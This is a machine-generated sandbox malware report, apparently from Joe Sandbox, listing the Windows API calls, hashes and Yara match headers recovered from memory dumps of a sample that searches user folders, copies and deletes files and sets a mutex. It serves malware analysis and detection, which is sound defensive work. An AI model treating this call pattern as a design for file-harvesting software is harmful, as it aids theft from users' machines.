                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 1243822799-0
                                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                        • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                        • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022F7CCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F7CD1
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022F7CE4
                                        • wsprintfA.USER32 ref: 022F7D1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                        • Instruction ID: bf295138270c4cc69baab17ac4a5d8d362901366e9326c417245979d569bef1b
                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                        • Instruction Fuzzy Hash: 93113CB1A45218EBEB248F94DD49FA9F7B8FB05721F1043AAF61AA32C0C77459408B51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strtok_s
                                        • String ID:
                                        • API String ID: 3330995566-0
                                        • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                        • Instruction ID: 3903c414c8317c720e5190a219f0d88bad3482c58d54c9ec0353ddc74ca36816
                                        • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                        • Instruction Fuzzy Hash: 00115AB0E1020AEFCB14CFE6D848BEEB7B5FB04704F00C028E525A6254D7789500CF54
                                        APIs
                                        • CreateFileA.KERNEL32(022F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022F3D55,?), ref: 022F9563
                                        • GetFileSizeEx.KERNEL32(000000FF,022F3D55), ref: 022F9580
                                        • CloseHandle.KERNEL32(000000FF), ref: 022F958E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                        • Instruction ID: 75cb15518caf11755f34c3d1d7ad2f19003ac83350c760d849f3d7a93ac02722
                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                        • Instruction Fuzzy Hash: A2F0AF39E50208BBDB60DFF0DC49B9EB7BAEB49310F10C264FA11A7284D63596418B40
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                        • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                        • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                        • ExitProcess.KERNEL32 ref: 022F6D89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                        • Instruction ID: a436c3b8b3d6e45c776222cd66e80b7e4a486e22324e16c618ce5a4eb0828588
                                        • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                        • Instruction Fuzzy Hash: 19F05E7A9A030AAEF790ABE1DC08BBDB67AEB05741F101538F722A5194CBB04500CA56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: `o@
                                        • API String ID: 0-590292170
                                        • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                        • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                        • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                        • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                        APIs
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                        • lstrcatA.KERNEL32(?,00860630), ref: 00414C08
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00861B48,?,000003E8), ref: 00414A4A
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: UaA
                                        • API String ID: 2104210347-3893042857
                                        • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                        • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                        • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                        • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • GetSystemTime.KERNEL32(?,0085BE78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SystemTimelstrcpy
                                        • String ID: cI@$cI@
                                        • API String ID: 62757014-1697673767
                                        • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                        • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                        • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                        • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                        APIs
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                        • lstrcatA.KERNEL32(?,0085FD88), ref: 004150A8
                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                        • String ID: aA
                                        • API String ID: 2699682494-2567749500
                                        • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                        • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                        • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                        • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                        APIs
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                        • lstrlen.KERNEL32(00000000), ref: 022EBF06
                                          • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                        • StrStrA.SHLWAPI(00000000,004213E0), ref: 022EBF34
                                        • lstrlen.KERNEL32(00000000), ref: 022EC00C
                                        • lstrlen.KERNEL32(00000000), ref: 022EC020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                        • String ID:
                                        • API String ID: 1440504306-0
                                        • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                        • Instruction ID: ed0e95bb81ccccef142ad951170bc854fc1dcf4b76684e0a1d3483a209fd5269
                                        • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                        • Instruction Fuzzy Hash: 2EB11F71920318ABDF58FBE4DD95EEDB33AAF64304F404169E60A62194EF346B48CF61
                                        APIs
                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFileNextlstrcat
                                        • String ID: !=A
                                        • API String ID: 3840410801-2919091325
                                        • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                        • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                        • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                        • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                        APIs
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F51E1
                                        • lstrcat.KERNEL32(?,00421070), ref: 022F51FE
                                        • lstrcat.KERNEL32(?,0064A5F8), ref: 022F5212
                                        • lstrcat.KERNEL32(?,00421074), ref: 022F5224
                                          • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                          • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                          • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                          • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                          • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                          • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                        • Instruction ID: 0bdaea05ca655ead524e857089f944e132c0aa86f526c94539ba6166496cc295
                                        • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                        • Instruction Fuzzy Hash: 8F21B67AA503087BC754FBE0DC45EE9737AAB55700F404198B64992184DE749AC9CFA2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID:
                                        • API String ID: 1206339513-0
                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                        • Instruction ID: cf556d70b8ffc62f258fefb865ef3c014a7be785c1c8317b948dd429a64abe9d
                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                        • Instruction Fuzzy Hash: 8401DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F9099B305C635AA40DB95